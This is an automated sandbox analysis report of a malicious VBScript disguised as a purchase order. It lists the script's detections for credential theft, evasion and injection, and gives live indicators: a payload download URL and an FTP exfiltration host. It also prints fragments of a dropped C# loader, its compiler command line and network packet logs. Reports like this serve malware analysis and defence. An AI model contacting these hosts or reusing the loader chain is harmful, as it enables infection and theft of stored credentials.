          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
          Process Injection
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755440 Sample: PO-09784893 xlsx.vbs Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 35 ftp.mcmprint.net 2->35 37 b3solutionscws.com 2->37 43 Multi AV Scanner detection for domain / URL 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 5 other signatures 2->49 9 wscript.exe 1 1 2->9         started        signatures3 process4 signatures5 59 Wscript starts Powershell (via cmd or directly) 9->59 61 Obfuscated command line found 9->61 63 Very long command line found 9->63 12 powershell.exe 25 9->12         started        16 cmd.exe 1 9->16         started        process6 file7 33 C:\Users\user\AppData\...\u5h0ocqr.cmdline, Unicode 12->33 dropped 65 Tries to detect Any.run 12->65 18 CasPol.exe 15 11 12->18         started        22 csc.exe 3 12->22         started        25 conhost.exe 12->25         started        27 conhost.exe 16->27         started        signatures8 process9 dnsIp10 39 b3solutionscws.com 192.185.145.188, 49816, 80 UNIFIEDLAYER-AS-1US United States 18->39 41 ftp.mcmprint.net 185.31.121.136, 21, 49819 RAX-ASBG Bulgaria 18->41 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->51 53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->53 55 Tries to steal Mail credentials (via file / registry access) 18->55 57 4 other signatures 18->57 31 C:\Users\user\AppData\Local\...\u5h0ocqr.dll, PE32 22->31 dropped 29 cvtres.exe 1 22->29         started        file11 signatures12 process13

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          PO-09784893 xlsx.vbs2%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          ftp.mcmprint.net10%VirustotalBrowse
          SourceDetectionScannerLabelLink
          ftp://ftp.mcmprint.netnoffice0%Avira URL Cloudsafe
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          https://go.micro0%Avira URL Cloudsafe
          http://b3solutionscws.com/wp-admin/includes/yyXYRRIJkuolPn153.fla0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
          https://contoso.com/0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
          https://contoso.com/License0%Avira URL Cloudsafe
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
          https://contoso.com/Icon0%Avira URL Cloudsafe
          http://OowQOv.com0%Avira URL Cloudsafe
          http://hWFpSCunbgPMSZDs.net0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          ftp.mcmprint.net
          185.31.121.136
          truefalseunknown
          b3solutionscws.com
          192.185.145.188
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://b3solutionscws.com/wp-admin/includes/yyXYRRIJkuolPn153.flafalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            low
            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000005.00000002.2622363726.0000000004BD0000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                ftp://ftp.mcmprint.netnofficeCasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://OowQOv.comCasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://hWFpSCunbgPMSZDs.netCasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://aka.ms/pscore6lBPlpowershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        192.185.145.188
                        b3solutionscws.comUnited States
                        46606UNIFIEDLAYER-AS-1USfalse
                        185.31.121.136
                        ftp.mcmprint.netBulgaria
                        199364RAX-ASBGfalse
                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:755440
                        Start date and time:2022-11-28 18:44:48 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 49s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:PO-09784893 xlsx.vbs
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                        Run name:Suspected Instruction Hammering
                        Number of analysed new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                        • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 20.190.159.64, 40.126.31.73, 20.190.159.2, 40.126.31.71, 20.190.159.75, 20.190.159.71, 20.190.159.73, 40.126.31.69
                        • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, prda.aadg.msidentity.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        No simulations
                        No context
                        No context
                        No context
                        No context
                        No context
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8003
                        Entropy (8bit):4.841989710132343
                        Encrypted:false
                        SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                        MD5:677C4E3A07935751EA3B092A5E23232F
                        SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                        SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                        SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                        Malicious:false
                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Mon Nov 28 18:47:34 2022, 1st section name ".debug$S"
                        Category:dropped
                        Size (bytes):1332
                        Entropy (8bit):3.9921267078861025
                        Encrypted:false
                        SSDEEP:24:HQzW9Yrrm5gHKwKPfwI+ycuZhNNakSLPNnqS2d:Cri5gBKPo1ulNa3hqSG
                        MD5:2706F0D7F5DABC5A1CC721DBA692F1EB
                        SHA1:CC65CD85D89F680C17DB16BE8E8CB58530E2EF11
                        SHA-256:620588E2053D963D41915EB65D5215C2F00626406C8BEABFDA33BB1EC8552DF8
                        SHA-512:F07612030E995F8E3AD846E2A69FC7C6D9BC189ABC8C07563F91042044E4F9EFE5BE9E91048B87845D43F775863E54FE41FE663C84F529C1A31BE3429785C179
                        Malicious:false
                        Preview:L...F..c.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\u5h0ocqr\CSC31BB2AFB2CA9494684B4A57A653EBF6B.TMP...................v.5..^h..++..............5.......C:\Users\user\AppData\Local\Temp\RESB964.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.5.h.0.o.c.q.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.0980330764827024
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7YnqqLPN5Dlq5J:+RI+ycuZhNNakSLPNnqX
                        MD5:CF76A035E6CF5E68BABD2B2B1AD6E4C7
                        SHA1:C1514CC6A2B7B4FFBD8F7EEBAD9E480571779443
                        SHA-256:1B0111D7F6316C3A023E61C0D21FF50A1D0FEC547E255F95FFBF1BE1A9112F6F
                        SHA-512:33A8E9C0EF13EC208A763442095D7F7D33790673991B231DB1CD5B356101215B2DCA18F345CD54291E2F528E64427E5E63C3F37A61764A780CF3048B25E88197
                        Malicious:false
                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.5.h.0.o.c.q.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.5.h.0.o.c.q.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1330), with no line terminators
                        Category:dropped
                        Size (bytes):1333
                        Entropy (8bit):5.039121039231445
                        Encrypted:false
                        SSDEEP:24:JVS3UwgVcVn1pl65/6f8cwM2sVS86mCVmuWyBeFcwXQ:JVAngyVn1pl65/6EPYpaVmry0FPXQ
                        MD5:5275A510067D1ABB9D22D3925B1C219F
                        SHA1:41B1A3E7A0EE598898BFDC2E5BFDF6A2D34E6D64
                        SHA-256:F44938B9BA94A2465515FD9EA6D319016294EAFA6EDC89A5D2E736195C3FA649
                        SHA-512:B8CC343A3A47116F796D7554DEF206E86DEFEF0379DE0D3EA8870B8655425CD9ADBD08600452313D9D9C7B0483BFCCF1809CB41AB53B36E24D951D6F1F7403DC
                        Malicious:false
                        Preview:.using System;using System.Runtime.InteropServices;public static class Thwartness1 {[DllImport("ADVAPI32.DLL")]public static extern int GetServiceKeyName(int Noyisl,int Slgt69,int Affal,int baga);[DllImport("gdi32")]public static extern int GetClipRgn(int Mul,int Ggegu);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int GlobalDeleteAtom(int Pre151);[DllImport("gdi32")]public static extern int StrokeAndFillPath(int Ethyl87);[DllImport("user32")]public static extern int CloseClipboard();[DllImport("winspool.drv")]public static extern int ScheduleJob(int Unover226,int akti);[DllImport("ADVAPI32.DLL")]public static extern int QueryServiceConfig(int Regler,int Cos0,int Dispos,int Napho27);[DllImport("winspool.drv")]public static extern int DocumentProperties(int Fors,int Langre,int Skriv,int hem,int Sambaf,int Reti);[DllImport("gdi32")]public static extern int PtVisible(int Sat,int Aspa,int Prjsis);[DllImpo
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.256918784888624
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fhMg+zxs7+AEszICN23fhMan:p37Lvkmb6Km5MfWZE75Ma
                        MD5:D434ED867F2BEDFD239B64F88AD3C65A
                        SHA1:1E6F95BCE2D835E04769E0927CF7421589BCAE6C
                        SHA-256:D7682C0718ABFC7CE651D1D5D895036778C92A950C16A93065526AA52B508C27
                        SHA-512:039A3610CAEC83FF4E70E6357F1C7FB0674FB50E54AB879A9CE6A9D8D7F38E018F2BA379D7FCBDA8F4AD5BF4234B385B3E8A4FED7E28808D6328CF33E620B2D0
                        Malicious:true
                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.0.cs"
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):4096
                        Entropy (8bit):3.3137761331931865
                        Encrypted:false
                        SSDEEP:48:6c94JSH+GEZhAdlfdW4DxrIUZQFNYg1ulNa3hq:DeSeHhYVdW0xrIUJfK
                        MD5:CD3E785DA5D5237AA385B4CD2972B654
                        SHA1:BA6615966F40545F716E729813BDC07F1D6A767F
                        SHA-256:5D2C059FED935989F937445329E7925092739DEFD1321AF96DFC48597DB599C6
                        SHA-512:55B8F968D4044D6961C5A0A48E193C8CE3CBBEAD568A60D2D991BDCD968C693729288BB29EFE9F5A70132D0CDE33875FDE97DD7A1D74E51202A60E21F17511A5
                        Malicious:false
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..c...........!.................'... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......P ..t...........................................................BSJB............v4.0.30319......l.......#~..T.......#Strings............#US.........#GUID.......p...#Blob...........G.........%3....................%.......................................3.,...............S.4.................................... :............ L............ W............ j............ {............ ..#.......... ............. ............. ..'.......... ..1.......... ............. ........
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):866
                        Entropy (8bit):5.31878829668306
                        Encrypted:false
                        SSDEEP:12:xKqR37Lvkmb6Km5MfWZE75MTKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Aqd3ka6KmXE7aKax5DqBVKVrdFAMBJTH
                        MD5:598DEDC2D4A52EA0EB3A1B60A9C9598E
                        SHA1:7B6AB880BAB1FD92B78F4EEDE77E7B47E9E7B2E9
                        SHA-256:E1094BEB4B40ABBF826AA1549999F7482D93D3222BE8C13A4424E6F6BFC5C665
                        SHA-512:1E632D8B7A5359AEAAB741EDC7E0BE72EFA66D98CB08F31B0E7155B8EF7BAE39DC090C1EF0B9BDBC8DD4B9B4FE2650A80A9727EA445DBF4D5E86B271F297B50F
                        Malicious:false
                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):30
                        Entropy (8bit):3.964735178725505
                        Encrypted:false
                        SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                        MD5:9F754B47B351EF0FC32527B541420595
                        SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                        SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                        SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                        Malicious:false
                        Preview:NordVPN directory not found!..
                        File type:ASCII text, with CRLF line terminators
                        Entropy (8bit):5.869402783042103
                        TrID:
                          File name:PO-09784893 xlsx.vbs
                          File size:359082
                          MD5:bfa859d9ad7b23d3606ea13f525065a7
                          SHA1:a1b3e395dc20bcdaa866b953a08a48d0079bace2
                          SHA256:ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002
                          SHA512:355600deeb50415c614e324248f918e3296a9e5b5cf0c3c89a4a41b4d796c6e556f418895fcd0bd132c38cea753e56d9f731b192e9bbf780f97a95847478017d
                          SSDEEP:6144:JBYNxYY6fG4TOZLzB65IL/IRL5PIQTzW42RcCUsaPw9L3x2I/rjbpHZIKK:7U6+4q5B65dRVPIQMcCUsqQU86KK
                          TLSH:A8748C1CDA2527D7FD1A735AA8D10AC83DED30251F26F769ACED4279F1C21D8873A209
                          File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                          Icon Hash:e8d69ece869a9ec4
                          TimestampSource PortDest PortSource IPDest IP
                          Nov 28, 2022 18:48:07.643614054 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.658411026 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.774609089 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.774907112 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.776026011 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.892116070 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.907953024 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908020973 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908077002 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908129930 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908184052 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908236980 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908273935 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.908273935 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.908292055 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908422947 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908449888 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.908478975 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908534050 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:08.908618927 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.908618927 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.908782005 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:08.908782005 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.024749994 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.024827957 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.024884939 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.024938107 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.024993896 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025048018 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025083065 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025083065 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025104046 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025158882 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025213957 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025250912 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025268078 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025321007 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025373936 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025423050 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025423050 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025423050 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025427103 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025481939 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025536060 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025588036 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025592089 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025679111 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025754929 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025763988 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025763988 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025763988 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.025815964 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025876999 CET8049816192.185.145.188192.168.11.20
                          Nov 28, 2022 18:48:09.025935888 CET4981680192.168.11.20192.185.145.188
                          Nov 28, 2022 18:48:09.026099920 CET4981680192.168.11.20192.185.145.188
